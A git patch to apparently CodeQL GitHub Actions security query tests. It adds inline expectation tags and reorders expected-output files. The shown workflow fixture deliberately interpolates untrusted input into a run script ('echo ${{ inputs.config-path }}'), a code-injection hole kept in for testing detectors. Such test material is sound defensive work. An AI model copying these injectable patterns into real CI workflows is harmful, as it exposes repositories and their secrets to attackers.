From 4d2e16e97bfffd4a6337de1f6c433cb6dd15617d Mon Sep 17 00:00:00 2001 
From: Owen Mansel-Chan Date: Wed, 10 Jun 2026 22:59:00 +0200 Subject: [PATCH] Actions --- .../.github/workflows/reusable_workflow.yml | 10 +- .../Models/CompositeActionsSinks.expected | 6 +- .../Models/CompositeActionsSinks.qlref | 3 +- .../Models/CompositeActionsSources.expected | 12 +- .../Models/CompositeActionsSources.qlref | 4 +- .../Models/CompositeActionsSummaries.expected | 4 +- .../Models/CompositeActionsSummaries.qlref | 4 +- .../Models/ReusableWorkflowsSinks.expected | 4 +- .../Models/ReusableWorkflowsSinks.qlref | 4 +- .../Models/ReusableWorkflowsSources.expected | 4 +- .../Models/ReusableWorkflowsSources.qlref | 4 +- .../ReusableWorkflowsSummaries.expected | 4 +- .../Models/ReusableWorkflowsSummaries.qlref | 4 +- .../query-tests/Models/action1/action.yml | 16 +- .../CWE-074/.github/workflows/output1.yml | 8 +- .../CWE-074/.github/workflows/output2.yml | 18 +- .../CWE-074/OutputClobberingHigh.expected | 18 +- .../CWE-074/OutputClobberingHigh.qlref | 3 +- .../.github/workflows/artifactpoisoning51.yml | 4 +- .../.github/workflows/artifactpoisoning52.yml | 4 +- .../.github/workflows/artifactpoisoning53.yml | 4 +- .../CWE-077/.github/workflows/path1.yml | 18 +- .../CWE-077/.github/workflows/test10.yml | 4 +- .../CWE-077/.github/workflows/test11.yml | 4 +- .../CWE-077/.github/workflows/test12.yml | 8 +- .../CWE-077/.github/workflows/test13.yml | 4 +- .../CWE-077/.github/workflows/test14.yml | 4 +- .../CWE-077/.github/workflows/test15.yml | 4 +- .../CWE-077/.github/workflows/test16.yml | 8 +- .../CWE-077/.github/workflows/test2.yml | 4 +- .../CWE-077/.github/workflows/test3.yml | 4 +- .../CWE-077/.github/workflows/test4.yml | 36 +- .../CWE-077/.github/workflows/test5.yml | 4 +- .../CWE-077/.github/workflows/test6.yml | 12 +- .../CWE-077/.github/workflows/test7.yml | 4 +- .../CWE-077/.github/workflows/test8.yml | 8 +- .../CWE-077/.github/workflows/test9.yml | 4 +- .../CWE-077/EnvPathInjectionCritical.expected | 12 +- .../CWE-077/EnvPathInjectionCritical.qlref 
| 3 +- .../CWE-077/EnvPathInjectionMedium.expected | 2 +- .../CWE-077/EnvPathInjectionMedium.qlref | 3 +- .../CWE-077/EnvVarInjectionCritical.expected | 74 ++-- .../CWE-077/EnvVarInjectionCritical.qlref | 3 +- .../CWE-077/EnvVarInjectionMedium.expected | 2 +- .../CWE-077/EnvVarInjectionMedium.qlref | 3 +- .../.github/workflows/comment_issue.yml | 2 +- .../CWE-078/CommandInjectionCritical.expected | 4 +- .../CWE-078/CommandInjectionCritical.qlref | 3 +- .../CWE-078/CommandInjectionMedium.expected | 2 +- .../CWE-078/CommandInjectionMedium.qlref | 3 +- .../.github/workflows/arg_injection.yml | 26 +- .../ArgumentInjectionCritical.expected | 26 +- .../CWE-088/ArgumentInjectionCritical.qlref | 3 +- .../CWE-088/ArgumentInjectionMedium.expected | 2 +- .../CWE-088/ArgumentInjectionMedium.qlref | 3 +- .../.github/actions/action1/action.yml | 2 +- .../.github/actions/action3/action.yml | 2 +- .../.github/actions/action4/action.yml | 2 +- .../.github/actions/action5/action.yml | 6 +- .../.github/actions/action6/action.yml | 2 +- .../.github/actions/action7/action.yml | 8 +- .../.github/actions/clone-repo/action.yaml | 2 +- .../external/ultralytics/actions/action.yaml | 4 +- .../.github/workflows/argus_case_study.yml | 4 +- .../.github/workflows/artifactpoisoning1.yml | 4 +- .../.github/workflows/artifactpoisoning2.yml | 4 +- .../.github/workflows/artifactpoisoning3.yml | 4 +- .../.github/workflows/artifactpoisoning4.yml | 4 +- .../.github/workflows/artifactpoisoning5.yml | 4 +- .../.github/workflows/artifactpoisoning6.yml | 6 +- .../.github/workflows/artifactpoisoning7.yml | 4 +- .../.github/workflows/artifactpoisoning8.yml | 4 +- .../.github/workflows/changed-files.yml | 12 +- .../.github/workflows/comment_issue.yml | 14 +- .../workflows/comment_issue_newline.yml | 6 +- .../workflows/composite-action-caller-3.yml | 6 +- .../workflows/composite-action-caller-4.yml | 4 +- .../CWE-094/.github/workflows/cross3.yml | 6 +- .../CWE-094/.github/workflows/discussion.yml | 4 +- 
.../.github/workflows/discussion_comment.yml | 6 +- .../.github/workflows/publishResults.yml | 4 +- .../.github/workflows/reusable-workflow.yml | 10 +- .../CWE-094/.github/workflows/gollum.yml | 8 +- .../workflows/image_link_generator.yml | 4 +- .../CWE-094/.github/workflows/inter-job0.yml | 4 +- .../CWE-094/.github/workflows/inter-job1.yml | 4 +- .../CWE-094/.github/workflows/inter-job2.yml | 4 +- .../CWE-094/.github/workflows/inter-job4.yml | 4 +- .../CWE-094/.github/workflows/inter-job5.yml | 2 +- .../CWE-094/.github/workflows/issues.yaml | 16 +- .../CWE-094/.github/workflows/json_wrap.yml | 4 +- .../CWE-094/.github/workflows/level0.yml | 4 +- .../CWE-094/.github/workflows/level1.yml | 2 +- .../.github/workflows/priv_pull_request.yml | 2 +- .../.github/workflows/pull_request_review.yml | 16 +- .../workflows/pull_request_review_comment.yml | 16 +- .../.github/workflows/pull_request_target.yml | 16 +- .../CWE-094/.github/workflows/push.yml | 20 +- .../workflows/push_and_workflow_dispatch.yml | 20 +- .../.github/workflows/reusable-workflow-1.yml | 10 +- .../.github/workflows/reusable-workflow-2.yml | 10 +- .../workflows/reusable-workflow-caller-1.yml | 2 +- .../workflows/reusable-workflow-caller-2.yml | 2 +- .../workflows/reusable-workflow-caller-3.yml | 2 +- .../CWE-094/.github/workflows/self_needs.yml | 6 +- .../CWE-094/.github/workflows/simple1.yml | 4 +- .../CWE-094/.github/workflows/simple2.yml | 4 +- .../CWE-094/.github/workflows/simple3.yml | 4 +- .../.github/workflows/slash_command2.yml | 2 +- .../CWE-094/.github/workflows/test.yml | 4 +- .../CWE-094/.github/workflows/test1.yml | 4 +- .../CWE-094/.github/workflows/test10.yml | 12 +- .../CWE-094/.github/workflows/test11.yml | 6 +- .../CWE-094/.github/workflows/test12.yml | 2 +- .../CWE-094/.github/workflows/test13.yml | 8 +- .../CWE-094/.github/workflows/test14.yml | 16 +- .../CWE-094/.github/workflows/test15.yml | 16 +- .../CWE-094/.github/workflows/test16.yml | 8 +- .../CWE-094/.github/workflows/test17.yml 
| 16 +- .../CWE-094/.github/workflows/test18.yml | 4 +- .../CWE-094/.github/workflows/test19.yml | 84 ++--- .../CWE-094/.github/workflows/test2.yml | 8 +- .../CWE-094/.github/workflows/test20.yml | 2 +- .../CWE-094/.github/workflows/test21.yml | 6 +- .../CWE-094/.github/workflows/test24.yml | 4 +- .../CWE-094/.github/workflows/test25.yml | 4 +- .../CWE-094/.github/workflows/test26.yml | 6 +- .../CWE-094/.github/workflows/test27.yml | 4 +- .../CWE-094/.github/workflows/test29.yml | 2 +- .../CWE-094/.github/workflows/test3.yml | 4 +- .../CWE-094/.github/workflows/test4.yml | 6 +- .../CWE-094/.github/workflows/test5.yml | 2 +- .../CWE-094/.github/workflows/test7.yml | 8 +- .../CWE-094/.github/workflows/test8.yml | 4 +- .../CWE-094/.github/workflows/test9.yml | 12 +- .../.github/workflows/untrusted_checkout1.yml | 4 +- .../.github/workflows/workflow_run.yml | 16 +- .../workflows/workflow_run_branches1.yml | 2 +- .../workflows/workflow_run_branches2.yml | 2 +- .../workflows/workflow_run_branches3.yml | 2 +- .../workflows/workflow_run_branches4.yml | 2 +- .../workflows/workflow_run_branches5.yml | 2 +- .../CWE-094/CodeInjectionCritical.expected | 334 +++++++++--------- .../CWE-094/CodeInjectionCritical.qlref | 3 +- .../CWE-094/CodeInjectionMedium.expected | 118 +++---- .../CWE-094/CodeInjectionMedium.qlref | 3 +- .../CWE-1395/.github/workflows/test1.yml | 4 +- .../CWE-1395/UseOfKnownVulnerableAction.qlref | 4 +- .../CWE-200/.github/workflows/test1.yml | 2 +- .../CWE-200/SecretExfiltration.expected | 4 +- .../Security/CWE-200/SecretExfiltration.qlref | 4 +- .../CWE-275/.github/workflows/perms1.yml | 2 +- .../CWE-275/.github/workflows/perms10.yml | 2 +- .../CWE-275/.github/workflows/perms2.yml | 2 +- .../CWE-275/.github/workflows/perms5.yml | 2 +- .../CWE-275/.github/workflows/perms6.yml | 2 +- .../CWE-275/.github/workflows/perms7.yml | 2 +- .../CWE-275/.github/workflows/perms8.yml | 2 +- .../CWE-275/.github/workflows/perms9.yml | 2 +- 
.../CWE-275/MissingActionsPermissions.qlref | 4 +- .../CWE-284/.github/workflows/test1.yml | 16 +- .../CodeExecutionOnSelfHostedRunner.qlref | 4 +- .../CWE-285/.github/workflows/test1.yml | 2 +- .../CWE-285/ImproperAccessControl.qlref | 4 +- .../workflows/secrets-in-artifacts.yml | 10 +- .../CWE-312/.github/workflows/test1.yml | 10 +- .../CWE-312/ExcessiveSecretsExposure.qlref | 4 +- .../Security/CWE-312/SecretsInArtifacts.qlref | 4 +- .../CWE-312/UnmaskedSecretExposure.qlref | 4 +- .../.github/workflows/code_injection1.yml | 2 +- .../.github/workflows/direct_cache1.yml | 4 +- .../.github/workflows/direct_cache2.yml | 4 +- .../.github/workflows/direct_cache3.yml | 4 +- .../.github/workflows/direct_cache4.yml | 4 +- .../.github/workflows/direct_cache5.yml | 4 +- .../.github/workflows/direct_cache6.yml | 4 +- .../.github/workflows/poisonable_step1.yml | 10 +- .../.github/workflows/poisonable_step2.yml | 4 +- .../.github/workflows/poisonable_step3.yml | 2 +- .../.github/workflows/poisonable_step4.yml | 2 +- .../.github/workflows/poisonable_step5.yml | 4 +- .../CachePoisoningViaCodeInjection.expected | 4 +- .../CachePoisoningViaCodeInjection.qlref | 4 +- .../CachePoisoningViaDirectCache.expected | 14 +- .../CachePoisoningViaDirectCache.qlref | 4 +- .../CachePoisoningViaPoisonableStep.expected | 16 +- .../CachePoisoningViaPoisonableStep.qlref | 4 +- .../CWE-367/.github/workflows/comment.yml | 6 +- .../CWE-367/.github/workflows/test0.yml | 6 +- .../CWE-367/.github/workflows/test4.yml | 4 +- .../CWE-367/.github/workflows/test5.yml | 8 +- .../CWE-367/.github/workflows/test6.yml | 10 +- .../UntrustedCheckoutTOCTOUCritical.expected | 22 +- .../UntrustedCheckoutTOCTOUCritical.qlref | 3 +- .../CWE-367/UntrustedCheckoutTOCTOUHigh.qlref | 3 +- .../CWE-571/.github/workflows/test1.yml | 22 +- .../CWE-571/.github/workflows/test2.yml | 22 +- .../ExpressionIsAlwaysTrueCritical.qlref | 3 +- .../CWE-571/ExpressionIsAlwaysTrueHigh.qlref | 3 +- 
.../actions/dangerous-git-checkout/action.yml | 2 +- .../actions/download-artifact-2/action.yaml | 2 +- .../actions/download-artifact/action.yaml | 2 +- .../.github/actions/unpinned-tag/action.yml | 2 +- .../workflows/actor_trusted_checkout.yml | 4 +- .../workflows/artifactpoisoning101.yml | 6 +- .../.github/workflows/artifactpoisoning11.yml | 4 +- .../.github/workflows/artifactpoisoning12.yml | 4 +- .../.github/workflows/artifactpoisoning21.yml | 6 +- .../.github/workflows/artifactpoisoning22.yml | 6 +- .../.github/workflows/artifactpoisoning31.yml | 4 +- .../.github/workflows/artifactpoisoning32.yml | 4 +- .../.github/workflows/artifactpoisoning33.yml | 4 +- .../.github/workflows/artifactpoisoning34.yml | 4 +- .../.github/workflows/artifactpoisoning41.yml | 4 +- .../.github/workflows/artifactpoisoning42.yml | 4 +- .../.github/workflows/artifactpoisoning71.yml | 6 +- .../.github/workflows/artifactpoisoning81.yml | 4 +- .../.github/workflows/artifactpoisoning91.yml | 4 +- .../.github/workflows/artifactpoisoning92.yml | 6 +- .../.github/workflows/artifactpoisoning96.yml | 2 +- .../CWE-829/.github/workflows/auto_ci.yml | 18 +- .../CWE-829/.github/workflows/dependabot2.yml | 2 +- .../CWE-829/.github/workflows/dependabot3.yml | 4 +- .../TestRepo/.github/workflows/reusable.yml | 4 +- .../CWE-829/.github/workflows/gitcheckout.yml | 4 +- .../issue_comment_3rd_party_action.yml | 6 +- .../workflows/issue_comment_direct.yml | 10 +- .../workflows/issue_comment_heuristic.yml | 4 +- .../workflows/issue_comment_octokit.yml | 12 +- .../workflows/issue_comment_octokit2.yml | 8 +- .../workflows/label_trusted_checkout1.yml | 4 +- .../workflows/label_trusted_checkout2.yml | 6 +- .../CWE-829/.github/workflows/level0.yml | 10 +- .../CWE-829/.github/workflows/mend.yml | 4 +- .../CWE-829/.github/workflows/poc.yml | 8 +- .../CWE-829/.github/workflows/poc2.yml | 6 +- .../CWE-829/.github/workflows/poc3.yml | 2 +- .../CWE-829/.github/workflows/pr-workflow.yml | 44 +-- 
.../workflows/priv_pull_request_checkout.yml | 2 +- .../.github/workflows/resolve-args.yml | 2 +- .../.github/workflows/reusable_local.yml | 4 +- .../CWE-829/.github/workflows/test10.yml | 4 +- .../CWE-829/.github/workflows/test11.yml | 4 +- .../CWE-829/.github/workflows/test12.yml | 2 +- .../CWE-829/.github/workflows/test13.yml | 4 +- .../CWE-829/.github/workflows/test14.yml | 4 +- .../CWE-829/.github/workflows/test15.yml | 4 +- .../CWE-829/.github/workflows/test17.yml | 6 +- .../CWE-829/.github/workflows/test18.yml | 6 +- .../CWE-829/.github/workflows/test22.yml | 2 +- .../CWE-829/.github/workflows/test25.yml | 4 +- .../CWE-829/.github/workflows/test27.yml | 4 +- .../CWE-829/.github/workflows/test28.yml | 2 +- .../CWE-829/.github/workflows/test29.yml | 4 +- .../CWE-829/.github/workflows/test3.yml | 2 +- .../CWE-829/.github/workflows/test4.yml | 2 +- .../CWE-829/.github/workflows/test7.yml | 12 +- .../CWE-829/.github/workflows/test8.yml | 2 +- .../CWE-829/.github/workflows/test9.yml | 2 +- .../.github/workflows/unpinned_tags.yml | 6 +- .../.github/workflows/untrusted_checkout.yml | 8 +- .../.github/workflows/untrusted_checkout2.yml | 2 +- .../.github/workflows/untrusted_checkout3.yml | 2 +- .../.github/workflows/untrusted_checkout4.yml | 8 +- .../workflow_run_untrusted_checkout.yml | 4 +- .../workflow_run_untrusted_checkout_2.yml | 4 +- .../ArtifactPoisoningCritical.expected | 38 +- .../CWE-829/ArtifactPoisoningCritical.qlref | 4 +- .../CWE-829/ArtifactPoisoningMedium.expected | 2 +- .../CWE-829/ArtifactPoisoningMedium.qlref | 4 +- .../ArtifactPoisoningPathTraversal.qlref | 4 +- .../Security/CWE-829/UnpinnedActionsTag.qlref | 3 +- .../UntrustedCheckoutCritical.expected | 80 ++--- .../CWE-829/UntrustedCheckoutCritical.qlref | 3 +- .../CWE-829/UntrustedCheckoutHigh.qlref | 3 +- .../CWE-829/UntrustedCheckoutMedium.qlref | 3 +- .../CWE-829/UnversionedImmutableAction.qlref | 3 +- .../CWE-918/.github/workflows/test.yml | 2 +- .../Security/CWE-918/RequestForgery.expected 
| 4 +- .../Security/CWE-918/RequestForgery.qlref | 3 +- .../.github/workflows/malformed.yml | 2 +- .../query-tests/SyntaxError/SyntaxError.qlref | 3 +- .../workflows/defaultable_workflow.yml | 2 +- .../UnnecessaryUseOfAdvancedConfig.qlref | 3 +- 284 files changed, 1181 insertions(+), 1157 deletions(-) diff --git a/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml b/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml index c2e9e17160d..de43f610827 100644 --- a/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml +++ b/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml @@ -3,14 +3,14 @@ name: Reusable workflow example on: workflow_call: inputs: - config-path: + config-path: # $ Source[actions/reusable-workflow-sinks] Source[actions/reusable-workflow-summaries] required: true type: string outputs: workflow-output1: - value: ${{ jobs.job1.outputs.job-output1 }} + value: ${{ jobs.job1.outputs.job-output1 }} # $ Alert[actions/reusable-workflow-summaries] workflow-output2: - value: ${{ jobs.job1.outputs.job-output2 }} + value: ${{ jobs.job1.outputs.job-output2 }} # $ Alert[actions/reusable-workflow-sources] secrets: token: required: true @@ -26,9 +26,9 @@ jobs: env: CONFIG_PATH: ${{ inputs.config-path }} run: | - echo ${{ inputs.config-path }} + echo ${{ inputs.config-path }} # $ Alert[actions/reusable-workflow-sinks] echo "::set-output name=step-output::$CONFIG_PATH" - name: Get changed files id: step2 - uses: tj-actions/changed-files@v40 + uses: tj-actions/changed-files@v40 # $ Source[actions/reusable-workflow-sources] diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected b/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected index 0a5bfe433e9..33f7bd28de6 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected +++ b/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected 
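Review bot: The `# $ Alert[actions/reusable-workflow-sinks]` appended to `echo ${{ inputs.config-path }}` sits inside the `run: |` literal block, so YAML does not treat it as a comment: it becomes part of the step's script, and is inert only because bash reads `#` as a comment introducer. The updated `ReusableWorkflowsSinks.expected` still places the sink at `29:17:29:41` (the expression), so the sink location is unaffected, but whether the extracted `Run` script value now carries the tag text is not visible here and is worth checking once before this placement is relied on across the suite. A plain YAML comment above the step, e.g. `# NOTE: expectation tags inside run: | blocks become script text (harmless for bash)`, would spare the next reader the same question; since it adds a line, regenerate the .expected afterwards. The job these steps belong to starts above the hunk.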
@@ -1,3 +1,6 @@ +#select +| action1/action.yml:32:18:32:51 | steps.replace.outputs.value | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | Sink | +| action1/action.yml:35:25:35:50 | inputs.who-to-greet | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | Sink | edges | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet | provenance | | | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | provenance | | @@ -10,6 +13,3 @@ nodes | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | semmle.label | steps.replace.outputs.value | | action1/action.yml:35:25:35:50 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | subpaths -#select -| action1/action.yml:32:18:32:51 | steps.replace.outputs.value | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | Sink | -| action1/action.yml:35:25:35:50 | inputs.who-to-greet | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | Sink | diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref index e5cb225ed24..d0379762036 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref +++ b/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref @@ -1 +1,2 @@ -Models/CompositeActionsSinks.ql +query: Models/CompositeActionsSinks.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSources.expected b/actions/ql/test/query-tests/Models/CompositeActionsSources.expected index 3be74bb8bf1..3f13be734e2 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSources.expected 
+++ b/actions/ql/test/query-tests/Models/CompositeActionsSources.expected @@ -1,3 +1,9 @@ +#select +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | edges | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | | | action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | provenance | | 
@@ -13,9 +19,3 @@ nodes | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | semmle.label | Run Step: source [tainted] | | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | subpaths -#select -| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | -| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | -| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | -| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | -| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref index 3b833d66912..fcdfec84bb7 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref +++ b/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref @@ -1,2 +1,2 @@ -Models/CompositeActionsSources.ql - +query: Models/CompositeActionsSources.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected index 067edb68bb1..43db3e5afa2 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected +++ b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected @@ -1,3 +1,5 @@ +#select +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Summary | edges | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet | provenance | | | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | | @@ -8,5 +10,3 @@ nodes | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | semmle.label | Run Step: reflector [reflected] | | action1/action.yml:41:30:41:55 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | subpaths -#select -| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Summary | diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref index ea9b7a304e6..7508e12c981 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref +++ b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref @@ -1,2 +1,2 @@ -Models/CompositeActionsSummaries.ql - +query: Models/CompositeActionsSummaries.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected index 18e9f0186df..3a496c7751e 100644 
--- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected @@ -1,3 +1,5 @@ +#select +| .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | Sink | edges | .github/workflows/calling_workflow.yml:12:5:15:2 | Job: call2 [workflow-output1] | .github/workflows/calling_workflow.yml:35:20:35:62 | needs.call2.outputs.workflow-output1 | provenance | | | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | | @@ -20,5 +22,3 @@ nodes | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | semmle.label | inputs.config-path | | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | semmle.label | inputs.config-path | subpaths -#select -| .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | Sink | diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref index fa8344d4bf9..8cc9921223a 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref @@ -1,2 +1,2 @@ -Models/ReusableWorkflowsSinks.ql - +query: Models/ReusableWorkflowsSinks.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected index c76034f74d4..c9132156dad 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected 
+++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected @@ -1,3 +1,5 @@ +#select +| .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | Source | edges | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | provenance | | | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | provenance | | @@ -8,5 +10,3 @@ nodes | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | semmle.label | steps.step2.outputs.all_changed_files | | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | semmle.label | Uses Step: step2 | subpaths -#select -| .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | Source | diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref index fe4299bdba4..4a35c574ad5 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref @@ -1,2 +1,2 @@ -Models/ReusableWorkflowsSources.ql - +query: Models/ReusableWorkflowsSources.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected index 8589d82d825..2a6c4269d52 100644 
--- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected @@ -1,3 +1,5 @@ +#select +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | Summary | edges | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | | | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | provenance | | @@ -12,5 +14,3 @@ nodes | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | semmle.label | Run Step: step1 [step-output] | | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | semmle.label | inputs.config-path | subpaths -#select -| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | Summary | diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref index 3547c8a4d07..7655b5f8010 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref @@ 